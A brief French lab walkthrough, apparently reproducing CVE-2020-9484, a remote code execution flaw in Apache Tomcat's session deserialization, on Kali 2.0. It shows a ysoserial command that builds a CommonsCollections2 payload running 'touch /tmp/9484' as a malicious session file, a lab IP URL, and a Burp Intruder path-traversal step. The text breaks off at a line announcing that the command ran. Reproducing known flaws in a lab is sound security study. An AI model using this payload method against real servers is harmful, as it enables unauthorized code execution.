
Reproduire la vulnérabilité d'exécution de code par désérialisation de session Apache Tomcat avec Kali 2.0
Reproduction de la vulnérabilité d'exécution de code par désérialisation de session Apache Tomcat CVE-2020-9484 avec Kali 2.0
/yourtomcatdir/bin/startup.sh
java -jar ysoserial-0.0.6-SNAPSHOT-all.jar CommonsCollections2 "touch /tmp/9484" > /tmp/22222.session
Accédez d'abord à S2-053 pour vérifier qu'il démarre correctement :
http://192.168.152.128:8080/s2-053/
Re-capturez le paquet et utilisez Intruder pour le parcours de chemin


Exécution de la commande réussie :
